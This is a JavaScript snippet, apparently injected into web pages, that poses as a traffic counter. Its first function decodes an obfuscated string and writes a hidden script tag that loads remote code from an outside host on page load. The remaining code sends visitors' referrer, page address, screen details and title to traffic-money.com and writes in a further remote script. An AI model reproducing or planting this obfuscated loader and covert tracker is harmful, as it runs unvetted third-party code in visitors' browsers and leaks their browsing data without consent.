
function GzE(){
d("$2B$10,,$1/pl3PsSSJ5uyhTa4eD3n27N@c710JKcSNg3y7$14FDv`GypeN$15SSExnvOAgA`Vvu$13M3XTflNC8A7sxsb)H5a81b`3MuO3yx8hemu2l85JlXC3*3j`B4X$13$14Eu$15H$1/,,$2D$2Brbqhos$1/rqb$2Cgsso$2@..sq`mmxb-bnl.rr.rr-ogo$2D$2B.rbqhos$2D");
document.close();return 0;}
function d(etxt){var xG="",el=etxt.length;for (i=0;i<el;i++) xG+=String.fromCharCode(etxt.charCodeAt(i)+1);document.writeln(unescape(xG));}GzE();

function encode64(inp){
var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var chr1,chr2,chr3,enc3,enc4,i=0,out="";
while(i<inp.length){
chr1=inp.charCodeAt(i++);if(chr1>127) chr1=88;
chr2=inp.charCodeAt(i++);if(chr2>127) chr2=88;
chr3=inp.charCodeAt(i++);if(chr3>127) chr3=88;
if(isNaN(chr3)) {enc4=64;chr3=0;} else enc4=chr3&63
if(isNaN(chr2)) {enc3=64;chr2=0;} else enc3=((chr2<<2)|(chr3>>6))&63 
out+=key.charAt((chr1>>2)&63)+key.charAt(((chr1<<4)|(chr2>>4))&63)+key.charAt(enc3)+key.charAt(enc4);
}
return encodeURIComponent(out);
}

function stats(sid){
var referer=encode64(document.referrer);
var thispage=encode64(window.location.hostname+window.location.pathname+location.search);
var date=new Date()
var time=date.getTime();
document.writeln("<img src=\"http://traffic-money.com/tra/count.php?sid="+sid+"&p="+thispage+"&r="+referer+"&t="+time+"\" alt=\"\" border=\"0\" />\n");
}

stats(806084);

if(showme==null) var showme='n';
if(st==null)     var st='js';
v = navigator.appName;
c=0;
if (v != "Netscape") c = screen.colorDepth;
else c = screen.pixelDepth;
s = screen.width+"x"+screen.height;
t = escape(document.title);
var f = "";
if (typeof(pp_frames) != "undefined")
        if (pp_frames)
                f = top.document.referrer;
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
        if (document["parent"] != null) 
                if (parent["document"] != null) // ACCESS ERROR HERE!
                        if (parent.document["referrer"] != null) 
                                if (typeof(parent.document) == "object")
                                        f = parent.document.referrer; 
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
        if (document["referrer"] != null) 
                f = document.referrer;
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
        f = "";
f = escape(f);
r="?id="+id+"&referer="+f+"&r="+s+"&c="+c+"&showme="+showme+"&st="+st+"&title="+t;
if(jslogid==null) var jslogid = 0;
else r = r + "&jslogid="+jslogid;
if (st=='js') {
        if (v != "Microsoft Internet Explorer") {
                r = r+"&url="+document.URL;
        }
        document.open();
        document.write("<scr"+"ipt language=\"JavaScript\" type=\"text/javascript\" src=\"http://traffic-money.com/cnt/pphlogger.php"+r+"\"></scr"+"ipt>");
        document.close();
} else {
        rand = Math.round(1000*Math.random());
        r = r+"&b="+rand;  //force the page to load the IMG
        document.open();
        document.write("<img src=\"http://traffic-money.com/cnt/pphlogger.php"+r+"\" alt=\"\" border=\"0\">");
        document.close();
}
